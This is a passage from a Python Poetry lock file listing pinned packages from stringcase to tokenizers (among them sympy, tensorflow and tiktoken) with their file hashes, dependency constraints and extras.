version = "1.2.0"
description = "String case converter."
optional = true
python-versions = "*"
files = [
{file = "stringcase-1.2.0.tar.gz", hash = "sha256:48a06980661908efe8d9d34eab2b6c13aefa2163b3ced26972902e3bdfd87008"},
]
[[package]]
name = "sympy"
version = "1.12"
description = "Computer algebra system (CAS) in Python"
optional = true
python-versions = ">=3.8"
files = [
{file = "sympy-1.12-py3-none-any.whl", hash = "sha256:c3588cd4295d0c0f603d0f2ae780587e64e2efeedb3521e46b9bb1d08d184fa5"},
{file = "sympy-1.12.tar.gz", hash = "sha256:ebf595c8dac3e0fdc4152c51878b498396ec7f30e7a914d6071e674d49420fb8"},
]
[package.dependencies]
mpmath = ">=0.19"
[[package]]
name = "syrupy"
version = "4.6.0"
description = "Pytest Snapshot Test Utility"
optional = false
python-versions = ">=3.8.1,<4"
files = [
{file = "syrupy-4.6.0-py3-none-any.whl", hash = "sha256:747aae1bcf3cb3249e33b1e6d81097874d23615982d5686ebe637875b0775a1b"},
{file = "syrupy-4.6.0.tar.gz", hash = "sha256:231b1f5d00f1f85048ba81676c79448076189c4aef4d33f21ae32f3b4c565a54"},
]
[package.dependencies]
pytest = ">=7.0.0,<8.0.0"
[[package]]
name = "telethon"
version = "1.31.1"
description = "Full-featured Telegram client library for Python 3"
optional = true
python-versions = ">=3.5"
files = [
{file = "Telethon-1.31.1.tar.gz", hash = "sha256:299567c307818e0ecd1ecb208c2f4269be4ea84fdea49b5061c36362dc92abbd"},
]
[package.dependencies]
pyaes = "*"
rsa = "*"
[package.extras]
cryptg = ["cryptg"]
[[package]]
name = "tenacity"
version = "8.2.3"
description = "Retry code until it succeeds"
optional = false
python-versions = ">=3.7"
files = [
{file = "tenacity-8.2.3-py3-none-any.whl", hash = "sha256:ce510e327a630c9e1beaf17d42e6ffacc88185044ad85cf74c0a8887c6a0f88c"},
{file = "tenacity-8.2.3.tar.gz", hash = "sha256:5398ef0d78e63f40007c1fb4c0bff96e1911394d2fa8d194f77619c05ff6cc8a"},
]
[package.extras]
doc = ["reno", "sphinx", "tornado (>=4.5)"]
[[package]]
name = "tensorboard"
version = "2.11.2"
description = "TensorBoard lets you watch Tensors Flow"
optional = true
python-versions = ">=3.7"
files = [
{file = "tensorboard-2.11.2-py3-none-any.whl", hash = "sha256:cbaa2210c375f3af1509f8571360a19ccc3ded1d9641533414874b5deca47e89"},
]
[package.dependencies]
absl-py = ">=0.4"
google-auth = ">=1.6.3,<3"
google-auth-oauthlib = ">=0.4.1,<0.5"
grpcio = ">=1.24.3"
markdown = ">=2.6.8"
numpy = ">=1.12.0"
protobuf = ">=3.9.2,<4"
requests = ">=2.21.0,<3"
setuptools = ">=41.0.0"
tensorboard-data-server = ">=0.6.0,<0.7.0"
tensorboard-plugin-wit = ">=1.6.0"
werkzeug = ">=1.0.1"
wheel = ">=0.26"
[[package]]
name = "tensorboard-data-server"
version = "0.6.1"
description = "Fast data loading for TensorBoard"
optional = true
python-versions = ">=3.6"
files = [
{file = "tensorboard_data_server-0.6.1-py3-none-any.whl", hash = "sha256:809fe9887682d35c1f7d1f54f0f40f98bb1f771b14265b453ca051e2ce58fca7"},
{file = "tensorboard_data_server-0.6.1-py3-none-macosx_10_9_x86_64.whl", hash = "sha256:fa8cef9be4fcae2f2363c88176638baf2da19c5ec90addb49b1cde05c95c88ee"},
{file = "tensorboard_data_server-0.6.1-py3-none-manylinux2010_x86_64.whl", hash = "sha256:d8237580755e58eff68d1f3abefb5b1e39ae5c8b127cc40920f9c4fb33f4b98a"},
]
[[package]]
name = "tensorboard-plugin-wit"
version = "1.8.1"
description = "What-If Tool TensorBoard plugin."
optional = true
python-versions = "*"
files = [
{file = "tensorboard_plugin_wit-1.8.1-py3-none-any.whl", hash = "sha256:ff26bdd583d155aa951ee3b152b3d0cffae8005dc697f72b44a8e8c2a77a8cbe"},
]
[[package]]
name = "tensorflow"
version = "2.11.1"
description = "TensorFlow is an open source machine learning framework for everyone."
optional = true
python-versions = ">=3.7"
files = [
{file = "tensorflow-2.11.1-cp310-cp310-macosx_10_14_x86_64.whl", hash = "sha256:ac0e46c5de7985def49e4f688a0ca4180949a4d5dc62b89e9c6640db3c3982ba"},
{file = "tensorflow-2.11.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:45b1669c523fa6dc240688bffe79f08dfbb76bf5e23a7fe10e722ba658637a44"},
{file = "tensorflow-2.11.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9a96595e0c068d54717405fa12f36b4a5bb0a9fc53fb9065155a92cff944b35b"},
{file = "tensorflow-2.11.1-cp310-cp310-win_amd64.whl", hash = "sha256:13197f18f31a52d3f2eac28743d1b06abb8efd86017f184110a1b16841b745b1"},
{file = "tensorflow-2.11.1-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:9f030f1bc9e7763fa03ec5738323c42021ababcd562fe861b3a3f41e9ff10e43"},
{file = "tensorflow-2.11.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9f12855c1e8373c1327650061fd6a9a3d3772e1bac8241202ea8ccb56213d005"},
{file = "tensorflow-2.11.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:76cd4279cb500074a8ab28af116af7f060f0b015651bef552769d51e55d6fd5c"},
{file = "tensorflow-2.11.1-cp38-cp38-win_amd64.whl", hash = "sha256:f5a2f75f28cd5fb615a5306f2091eac7da3a8fff949ab8804ec06b8e3682f837"},
{file = "tensorflow-2.11.1-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:ea93246ad6c90ff0422f06a82164836fe8098989a8a65c3b02c720eadbe15dde"},
{file = "tensorflow-2.11.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:30ba6b3c2f68037e965a19427a1f2a5f0351b7ceae6c686938a8485b08e1e1f3"},
{file = "tensorflow-2.11.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9ddd5c61f68d8125c985370de96a24a80aee5e3f1604efacec7e1c34ca72de24"},
{file = "tensorflow-2.11.1-cp39-cp39-win_amd64.whl", hash = "sha256:b7d8834df3f72d7eab56bc2f34f2e52b82d705776b80b36bf5470b7538c9865c"},
]
[package.dependencies]
absl-py = ">=1.0.0"
astunparse = ">=1.6.0"
flatbuffers = ">=2.0"
gast = ">=0.2.1,<=0.4.0"
google-pasta = ">=0.1.1"
grpcio = ">=1.24.3,<2.0"
h5py = ">=2.9.0"
keras = ">=2.11.0,<2.12"
libclang = ">=13.0.0"
numpy = ">=1.20"
opt-einsum = ">=2.3.2"
packaging = "*"
protobuf = ">=3.9.2,<3.20"
setuptools = "*"
six = ">=1.12.0"
tensorboard = ">=2.11,<2.12"
tensorflow-estimator = ">=2.11.0,<2.12"
tensorflow-io-gcs-filesystem = {version = ">=0.23.1", markers = "platform_machine != \"arm64\" or platform_system != \"Darwin\""}
termcolor = ">=1.1.0"
typing-extensions = ">=3.6.6"
wrapt = ">=1.11.0"
[[package]]
name = "tensorflow-estimator"
version = "2.11.0"
description = "TensorFlow Estimator."
optional = true
python-versions = ">=3.7"
files = [
{file = "tensorflow_estimator-2.11.0-py2.py3-none-any.whl", hash = "sha256:ea3b64acfff3d9a244f06178c9bdedcbdd3f125b67d0888dba8229498d06468b"},
]
[[package]]
name = "tensorflow-hub"
version = "0.15.0"
description = "TensorFlow Hub is a library to foster the publication, discovery, and consumption of reusable parts of machine learning models."
optional = true
python-versions = "*"
files = [
{file = "tensorflow_hub-0.15.0-py2.py3-none-any.whl", hash = "sha256:8af12cb2d1fc0d1a9509a620e7589daf173714e99f08aaf090a4748ff20b45c8"},
]
[package.dependencies]
numpy = ">=1.12.0"
protobuf = ">=3.19.6"
[[package]]
name = "tensorflow-io-gcs-filesystem"
version = "0.34.0"
description = "TensorFlow IO"
optional = true
python-versions = ">=3.7, <3.12"
files = [
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-macosx_10_14_x86_64.whl", hash = "sha256:d831702fbb270996b27cda7fde06e0825b2ea81fd8dd3ead35242f4f8b3889b8"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:b9a93fcb01db269bc845a1ced431f3c61201755ce5f9ec4885760f30122276ef"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:5813c336b4f7cb0a01ff4cc6cbd3edf11ef67305baf0e3cf634911b702f493f8"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2b035f4c92639657b6d376929d550ac3dee9e6c0523eb434eefe0a27bae3d05b"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-macosx_10_14_x86_64.whl", hash = "sha256:a17a616d2c7fae83de4424404815843507d40d4eb0d507c636a5493a20c3d958"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:ec4604c99cbb5b708f4516dee27aa655abae222b876c98b740f4c2f89dd5c001"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:cbe26c4a3332589c7b724f147df453b5c226993aa8d346a15536358d77b364c4"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6e6353123a5b51397950138a118876af833a7db66b531123bb86f82e80ab0e72"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp37-cp37m-macosx_10_14_x86_64.whl", hash = "sha256:f211d2b3db8f9931765992b607b71cbfb98c8cd6169079d004a67a94ab10ecb4"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp37-cp37m-macosx_12_0_arm64.whl", hash = "sha256:d3feba2dd76f7c188137c34642d68d378f0eed81636cb95090ecb1496722707c"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:44ad387a812a78e7424bb8bee3820521ae1c044bddf72b1e163e8df95c124a74"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:7f60183473f0ca966451bb1d1bb5dc29b3cf9c74d1d0e7f2ed46760ed56bd4af"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:3f346b287ed2400e09b13cfd8524222fd70a66aadb9164c645286c2087007e9f"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:027a07553367187f918a99661f63ae0506b91b77a70bee9c7ccaf3920bf7cfe7"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8d8664bddbe4e7b56ce94db8b93ea9077a158fb5e15364e11e29f93015ceea24"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:182b0fbde7e9a537fda0b354c28b0b6c035736728de8fe2db7ef49cf90352014"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:0dafed144673e1173528768fe208a7c5a6e8edae40208381cac420ee7c918ec9"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:396bfff61b49f80b86ddebe0c76ae0f2731689cee49ad7d782625180b50b13af"},
{file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b20622f8572fcb6c93e8f7d626327472f263e47ebd63d2153ef09162ef5ef7b5"},
]
[package.extras]
tensorflow = ["tensorflow (>=2.13.0,<2.14.0)"]
tensorflow-aarch64 = ["tensorflow-aarch64 (>=2.13.0,<2.14.0)"]
tensorflow-cpu = ["tensorflow-cpu (>=2.13.0,<2.14.0)"]
tensorflow-gpu = ["tensorflow-gpu (>=2.13.0,<2.14.0)"]
tensorflow-rocm = ["tensorflow-rocm (>=2.13.0,<2.14.0)"]
[[package]]
name = "tensorflow-macos"
version = "2.11.0"
description = "TensorFlow is an open source machine learning framework for everyone."
optional = true
python-versions = ">=3.7"
files = [
{file = "tensorflow_macos-2.11.0-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:0bdbd1bb564d01bd735d6d11451f0658c3dd8187369ee9dd3ed6de6bbdd6df53"},
{file = "tensorflow_macos-2.11.0-cp310-cp310-macosx_12_0_x86_64.whl", hash = "sha256:66eb67915cf418eddd3b4c158132609efd50895fa09fd55e4b2f14a3ab85bd34"},
{file = "tensorflow_macos-2.11.0-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:6810731e2c8353123f6c9c944d2765b58a2226e7eb9fec1e360f73977c6c6aa4"},
{file = "tensorflow_macos-2.11.0-cp38-cp38-macosx_12_0_x86_64.whl", hash = "sha256:881b36d97b67d24197250a091c52c31db14aecfdbf1ac20418a148ec37321978"},
{file = "tensorflow_macos-2.11.0-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:8d56b0d0bd140008b0cc4877804c9c310e1e2735444fa99bc7c88ffb2909153d"},
{file = "tensorflow_macos-2.11.0-cp39-cp39-macosx_12_0_x86_64.whl", hash = "sha256:db97cd91b905bd01069069f07325a2a291705222eb4914148b9574090a5815ae"},
]
[package.dependencies]
absl-py = ">=1.0.0"
astunparse = ">=1.6.0"
flatbuffers = ">=2.0"
gast = ">=0.2.1,<=0.4.0"
google-pasta = ">=0.1.1"
grpcio = ">=1.24.3,<2.0"
h5py = ">=2.9.0"
keras = ">=2.11.0,<2.12"
libclang = ">=13.0.0"
numpy = ">=1.20"
opt-einsum = ">=2.3.2"
packaging = "*"
protobuf = ">=3.9.2,<3.20"
setuptools = "*"
six = ">=1.12.0"
tensorboard = ">=2.11,<2.12"
tensorflow-estimator = ">=2.11.0,<2.12"
termcolor = ">=1.1.0"
typing-extensions = ">=3.6.6"
wrapt = ">=1.11.0"
[[package]]
name = "tensorflow-text"
version = "2.11.0"
description = "TF.Text is a TensorFlow library of text related ops, modules, and subgraphs."
optional = true
python-versions = "*"
files = [
{file = "tensorflow_text-2.11.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c9d4797e331da37419f2b19159fbc0f125ed60467340e9a209ab8f8d65856704"},
{file = "tensorflow_text-2.11.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b4abede4191820ae6d5a7c74f02c335a5f2e2df174eaa38b481b2b82a3330152"},
{file = "tensorflow_text-2.11.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:49194f85e03a2e3f017ac8e0e3d3927104fa20e6e883b43087cff032fe2cbe14"},
{file = "tensorflow_text-2.11.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a3ea14efeb1d627ed5098e791e95bb98ee6f9f928f9eda785205e184cc20b428"},
{file = "tensorflow_text-2.11.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:a207ceea4c71a932c35e4d208d7b8c3edc65a5ba0eebfdc9233fc8da546625c9"},
{file = "tensorflow_text-2.11.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:506fbea82a1ec566d7d0f771adad589c44727d904311103169466d88236ec2c8"},
{file = "tensorflow_text-2.11.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:cf0033bf47872b57d46f78d7058db5676f396a9327fa4d063a2c73cce43586ae"},
{file = "tensorflow_text-2.11.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:56693df33461ab0e7f32549010ca38a8d01291fd67142e0396d0aeb9fcad2e09"},
]
[package.dependencies]
tensorflow = {version = ">=2.11.0,<2.12", markers = "platform_machine != \"arm64\" or platform_system != \"Darwin\""}
tensorflow-hub = ">=0.8.0"
tensorflow-macos = {version = ">=2.11.0,<2.12", markers = "platform_machine == \"arm64\" and platform_system == \"Darwin\""}
[package.extras]
tensorflow-cpu = ["tensorflow-cpu (>=2.11.0,<2.12)"]
tests = ["absl-py", "pytest", "tensorflow-datasets (>=3.2.0)"]
[[package]]
name = "termcolor"
version = "2.3.0"
description = "ANSI color formatting for output in terminal"
optional = true
python-versions = ">=3.7"
files = [
{file = "termcolor-2.3.0-py3-none-any.whl", hash = "sha256:3afb05607b89aed0ffe25202399ee0867ad4d3cb4180d98aaf8eefa6a5f7d475"},
{file = "termcolor-2.3.0.tar.gz", hash = "sha256:b5b08f68937f138fe92f6c089b99f1e2da0ae56c52b78bf7075fd95420fd9a5a"},
]
[package.extras]
tests = ["pytest", "pytest-cov"]
[[package]]
name = "terminado"
version = "0.17.1"
description = "Tornado websocket backend for the Xterm.js Javascript terminal emulator library."
optional = false
python-versions = ">=3.7"
files = [
{file = "terminado-0.17.1-py3-none-any.whl", hash = "sha256:8650d44334eba354dd591129ca3124a6ba42c3d5b70df5051b6921d506fdaeae"},
{file = "terminado-0.17.1.tar.gz", hash = "sha256:6ccbbcd3a4f8a25a5ec04991f39a0b8db52dfcd487ea0e578d977e6752380333"},
]
[package.dependencies]
ptyprocess = {version = "*", markers = "os_name != \"nt\""}
pywinpty = {version = ">=1.1.0", markers = "os_name == \"nt\""}
tornado = ">=6.1.0"
[package.extras]
docs = ["myst-parser", "pydata-sphinx-theme", "sphinx"]
test = ["pre-commit", "pytest (>=7.0)", "pytest-timeout"]
[[package]]
name = "textstat"
version = "0.7.3"
description = "Calculate statistical features from text"
optional = true
python-versions = ">=3.6"
files = [
{file = "textstat-0.7.3-py3-none-any.whl", hash = "sha256:cbd9d641aa5abff0852638f0489913f31ea52fe597ccbaa337b4fc2a44efd15e"},
{file = "textstat-0.7.3.tar.gz", hash = "sha256:60b63cf8949f45bbb3b4205e4411bbc1cd66df4c08aef12545811c7e6e24f011"},
]
[package.dependencies]
pyphen = "*"
[[package]]
name = "threadpoolctl"
version = "3.2.0"
description = "threadpoolctl"
optional = true
python-versions = ">=3.8"
files = [
{file = "threadpoolctl-3.2.0-py3-none-any.whl", hash = "sha256:2b7818516e423bdaebb97c723f86a7c6b0a83d3f3b0970328d66f4d9104dc032"},
{file = "threadpoolctl-3.2.0.tar.gz", hash = "sha256:c96a0ba3bdddeaca37dc4cc7344aafad41cdb8c313f74fdfe387a867bba93355"},
]
[[package]]
name = "tigrisdb"
version = "1.0.0b6"
description = "Python SDK for Tigris <http://www.tigrisdata.com>"
optional = true
python-versions = ">=3.8,<4.0"
files = [
{file = "tigrisdb-1.0.0b6-py3-none-any.whl", hash = "sha256:8d316a61df0df09f6a269be729f8077af965d6bc39f6a00b60d3ffcb57f9d80b"},
{file = "tigrisdb-1.0.0b6.tar.gz", hash = "sha256:5160b3379aaa379fa4194c3e5d549e8be723aab922991021b8c0afd340ff14f5"},
]
[package.dependencies]
grpcio-tools = ">=1.46.0"
protobuf = ">=3.19.6"
[[package]]
name = "tiktoken"
version = "0.3.3"
description = "tiktoken is a fast BPE tokeniser for use with OpenAI's models"
optional = false
python-versions = ">=3.8"
files = [
{file = "tiktoken-0.3.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d1f37fa75ba70c1bc7806641e8ccea1fba667d23e6341a1591ea333914c226a9"},
{file = "tiktoken-0.3.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:3d7296c38392a943c2ccc0b61323086b8550cef08dcf6855de9949890dbc1fd3"},
{file = "tiktoken-0.3.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3c84491965e139a905280ac28b74baaa13445b3678e07f96767089ad1ef5ee7b"},
{file = "tiktoken-0.3.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:65970d77ea85ce6c7fce45131da9258cd58a802ffb29ead8f5552e331c025b2b"},
{file = "tiktoken-0.3.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:bd3f72d0ba7312c25c1652292121a24c8f1711207b63c6d8dab21afe4be0bf04"},
{file = "tiktoken-0.3.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:719c9e13432602dc496b24f13e3c3ad3ec0d2fbdb9aace84abfb95e9c3a425a4"},
{file = "tiktoken-0.3.3-cp310-cp310-win_amd64.whl", hash = "sha256:dc00772284c94e65045b984ed7e9f95d000034f6b2411df252011b069bd36217"},
{file = "tiktoken-0.3.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:4db2c40f79f8f7a21a9fdbf1c6dee32dea77b0d7402355dc584a3083251d2e15"},
{file = "tiktoken-0.3.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e3c0f2231aa3829a1a431a882201dc27858634fd9989898e0f7d991dbc6bcc9d"},
{file = "tiktoken-0.3.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:48c13186a479de16cfa2c72bb0631fa9c518350a5b7569e4d77590f7fee96be9"},
{file = "tiktoken-0.3.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6674e4e37ab225020135cd66a392589623d5164c6456ba28cc27505abed10d9e"},
{file = "tiktoken-0.3.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:4a0c1357f6191211c544f935d5aa3cb9d7abd118c8f3c7124196d5ecd029b4af"},
{file = "tiktoken-0.3.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:2e948d167fc3b04483cbc33426766fd742e7cefe5346cd62b0cbd7279ef59539"},
{file = "tiktoken-0.3.3-cp311-cp311-win_amd64.whl", hash = "sha256:5dca434c8680b987eacde2dbc449e9ea4526574dbf9f3d8938665f638095be82"},
{file = "tiktoken-0.3.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:984758ebc07cd8c557345697c234f1f221bd730b388f4340dd08dffa50213a01"},
{file = "tiktoken-0.3.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:891012f29e159a989541ae47259234fb29ff88c22e1097567316e27ad33a3734"},
{file = "tiktoken-0.3.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:210f8602228e4c5d706deeb389da5a152b214966a5aa558eec87b57a1969ced5"},
{file = "tiktoken-0.3.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd783564f80d4dc44ff0a64b13756ded8390ed2548549aefadbe156af9188307"},
{file = "tiktoken-0.3.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:03f64bde9b4eb8338bf49c8532bfb4c3578f6a9a6979fc176d939f9e6f68b408"},
{file = "tiktoken-0.3.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:1ac369367b6f5e5bd80e8f9a7766ac2a9c65eda2aa856d5f3c556d924ff82986"},
{file = "tiktoken-0.3.3-cp38-cp38-win_amd64.whl", hash = "sha256:94600798891f78db780e5aa9321456cf355e54a4719fbd554147a628de1f163f"},
{file = "tiktoken-0.3.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:e59db6fca8d5ccea302fe2888917364446d6f4201a25272a1a1c44975c65406a"},
{file = "tiktoken-0.3.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:19340d8ba4d6fd729b2e3a096a547ded85f71012843008f97475f9db484869ee"},
{file = "tiktoken-0.3.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:542686cbc9225540e3a10f472f82fa2e1bebafce2233a211dee8459e95821cfd"},
{file = "tiktoken-0.3.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a43612b2a09f4787c050163a216bf51123851859e9ab128ad03d2729826cde9"},
{file = "tiktoken-0.3.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:a11674f0275fa75fb59941b703650998bd4acb295adbd16fc8af17051aaed19d"},
{file = "tiktoken-0.3.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:65fc0a449630bab28c30b4adec257442a4706d79cffc2337c1d9df3e91825cdd"},
{file = "tiktoken-0.3.3-cp39-cp39-win_amd64.whl", hash = "sha256:0b9a7a9a8b781a50ee9289e85e28771d7e113cc0c656eadfb6fc6d3a106ff9bb"},
{file = "tiktoken-0.3.3.tar.gz", hash = "sha256:97b58b7bfda945791ec855e53d166e8ec20c6378942b93851a6c919ddf9d0496"},
]
[package.dependencies]
regex = ">=2022.1.18"
requests = ">=2.26.0"
[package.extras]
blobfile = ["blobfile (>=2)"]
[[package]]
name = "timescale-vector"
version = "0.0.1"
description = "Python library for storing vector data in Postgres"
optional = true
python-versions = ">=3.7"
files = [
{file = "timescale-vector-0.0.1.tar.gz", hash = "sha256:420d088b1d45e98f5b9770c76ddf826521aa6e813cb4997d24355eaeda1a7775"},
{file = "timescale_vector-0.0.1-py3-none-any.whl", hash = "sha256:81283e8f359387bacd2bd092431a288f34c211968c53b3fed7f3fed1979f39eb"},
]
[package.dependencies]
asyncpg = "*"
pgvector = "*"
psycopg2 = "*"
[package.extras]
dev = ["python-dotenv"]
[[package]]
name = "tinycss2"
version = "1.2.1"
description = "A tiny CSS parser"
optional = false
python-versions = ">=3.7"
files = [
{file = "tinycss2-1.2.1-py3-none-any.whl", hash = "sha256:2b80a96d41e7c3914b8cda8bc7f705a4d9c49275616e886103dd839dfc847847"},
{file = "tinycss2-1.2.1.tar.gz", hash = "sha256:8cff3a8f066c2ec677c06dbc7b45619804a6938478d9d73c284b29d14ecb0627"},
]
[package.dependencies]
webencodings = ">=0.4"
[package.extras]
doc = ["sphinx", "sphinx_rtd_theme"]
test = ["flake8", "isort", "pytest"]
[[package]]
name = "tinysegmenter"
version = "0.3"
description = "Very compact Japanese tokenizer"
optional = true
python-versions = "*"
files = [
{file = "tinysegmenter-0.3.tar.gz", hash = "sha256:ed1f6d2e806a4758a73be589754384cbadadc7e1a414c81a166fc9adf2d40c6d"},
]
[[package]]
name = "tldextract"
version = "5.0.1"
description = "Accurately separates a URL's subdomain, domain, and public suffix, using the Public Suffix List (PSL). By default, this includes the public ICANN TLDs and their exceptions. You can optionally support the Public Suffix List's private domains as well."
optional = true
python-versions = ">=3.8"
files = [
{file = "tldextract-5.0.1-py3-none-any.whl", hash = "sha256:8322fa2b73d9572c6bde31e96f66b694abb86d85b32ed6082593da806a6d33b4"},
{file = "tldextract-5.0.1.tar.gz", hash = "sha256:ac1c5daa02616e9c2608f5fb6dd93049db03d0cf46c7f6fad46e2850a984f019"},
]
[package.dependencies]
filelock = ">=3.0.8"
idna = "*"
requests = ">=2.1.0"
requests-file = ">=1.4"
[[package]]
name = "tokenizers"
version = "0.13.3"
description = "Fast and Customizable Tokenizers"
optional = false
python-versions = "*"
files = [
{file = "tokenizers-0.13.3-cp310-cp310-macosx_10_11_x86_64.whl", hash = "sha256:f3835c5be51de8c0a092058a4d4380cb9244fb34681fd0a295fbf0a52a5fdf33"},
{file = "tokenizers-0.13.3-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:4ef4c3e821730f2692489e926b184321e887f34fb8a6b80b8096b966ba663d07"},
{file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c5fd1a6a25353e9aa762e2aae5a1e63883cad9f4e997c447ec39d071020459bc"},
{file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ee0b1b311d65beab83d7a41c56a1e46ab732a9eed4460648e8eb0bd69fc2d059"},
{file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5ef4215284df1277dadbcc5e17d4882bda19f770d02348e73523f7e7d8b8d396"},
{file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a4d53976079cff8a033f778fb9adca2d9d69d009c02fa2d71a878b5f3963ed30"},
{file = "tokenizers-0.13.3-cp310-cp310-win32.whl", hash = "sha256:1f0e3b4c2ea2cd13238ce43548959c118069db7579e5d40ec270ad77da5833ce"},
{file = "tokenizers-0.13.3-cp310-cp310-win_amd64.whl", hash = "sha256:89649c00d0d7211e8186f7a75dfa1db6996f65edce4b84821817eadcc2d3c79e"},
{file = "tokenizers-0.13.3-cp311-cp311-macosx_10_11_universal2.whl", hash = "sha256:56b726e0d2bbc9243872b0144515ba684af5b8d8cd112fb83ee1365e26ec74c8"},
{file = "tokenizers-0.13.3-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:cc5c022ce692e1f499d745af293ab9ee6f5d92538ed2faf73f9708c89ee59ce6"},
{file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f55c981ac44ba87c93e847c333e58c12abcbb377a0c2f2ef96e1a266e4184ff2"},
{file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f247eae99800ef821a91f47c5280e9e9afaeed9980fc444208d5aa6ba69ff148"},
